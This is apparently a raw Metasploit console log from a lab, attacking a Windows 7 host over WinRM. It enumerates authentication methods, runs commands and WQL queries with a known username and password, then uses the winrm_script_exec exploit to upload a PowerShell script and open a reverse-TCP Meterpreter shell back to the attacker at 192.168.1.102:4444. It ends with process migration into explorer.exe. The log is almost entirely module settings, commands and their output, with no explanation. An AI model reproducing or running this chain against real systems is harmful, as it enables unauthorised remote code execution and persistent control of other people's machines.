msf auxiliary(winrm_auth_methods) > show options
Module options (auxiliary/scanner/winrm/winrm_auth_methods):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain tousefor Windows authentification
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.103 yes The target address rangeor CIDR identifier
RPORT 5985 yes The target port
THREADS 1 yes The number of concurrent threads
URI /wsman yes The URI of the WinRM service
VHOST no HTTP server virtual host
msf auxiliary(winrm_auth_methods) > run
[+] 192.168.1.103:5985: Negotiate protocol supported
[+] 192.168.1.103:5985: Basic protocol supported
[*] Scanned 1of1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(winrm_cmd) > show options
Module options (auxiliary/scanner/winrm/winrm_cmd):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD whoami yes The windows command to run
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD password yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.103yes The target address range or CIDR identifier
RPORT 5985yes The target port
SAVE_OUTPUT falseyes Store output as loot
THREADS 1yes The number of concurrent threads
URI /wsman yes The URI of the WinRM service
USERNAME lab yes The username to authenticate as
VHOST no HTTP server virtual host
msf auxiliary(winrm_cmd) > run
[+] sec\lab
[*] Scanned 1of1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(winrm_wql) > show options
Module options (auxiliary/scanner/winrm/winrm_wql):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain tousefor Windows authentification
NAMESPACE /root/cimv2/ yes The WMI namespace tousefor queries
PASSWORD password yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.103 yes The target address rangeor CIDR identifier
RPORT 5985 yes The target port
THREADS 1 yes The number of concurrent threads
URI /wsman yes The URI of the WinRM service
USERNAME lab yes The username to authenticate as
VHOST no HTTP server virtual host
WQL Select Name,Status from Win32_Service yes The WQL query to run
msf auxiliary(winrm_wql) > run
[+] Select Name,Status from Win32_Service (192.168.1.103)
=====================================================
Name Status
---- ------
ALG OK
AeLookupSvc OK
AppIDSvc OK
AppMgmt OK
......
......
msf exploit(winrm_script_exec) > show options
Module options (exploit/windows/winrm/winrm_script_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS false yes Force the module to use the VBS CmdStager
PASSWORD password yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.1.103 yes The target address
RPORT 5985 yes The target port
URI /wsman yes The URI ofthe WinRM service
USERNAME lab yes A specific username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----0 Windows
msf exploit(winrm_script_exec) > run
[*] Started reverse TCP handler on192.168.1.102:4444
[*] checking for Powershell 2.0
[-] You selected an x86 payload for an x64 target...trying torunin compat mode
[*] Attempting toset Execution Policy
[+] Set Execution Policy Successfully
[*] Grabbing %TEMP%
[*] Uploading powershell scriptto C:\Users\lab\AppData\Local\Temp\XcemuUGC.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (957487 bytes) to192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:49514) at2015-12-2615:37:13 +0800
meterpreter >
[*] Session ID 1 (192.168.1.102:4444 -> 192.168.1.103:49514) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (1836)
[*] Attempting to move into explorer.exe for current user...
[+] Migrating to2844
[+] Successfully migrated to process 2844
meterpreter > sysinfo
Computer : SEC
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/win64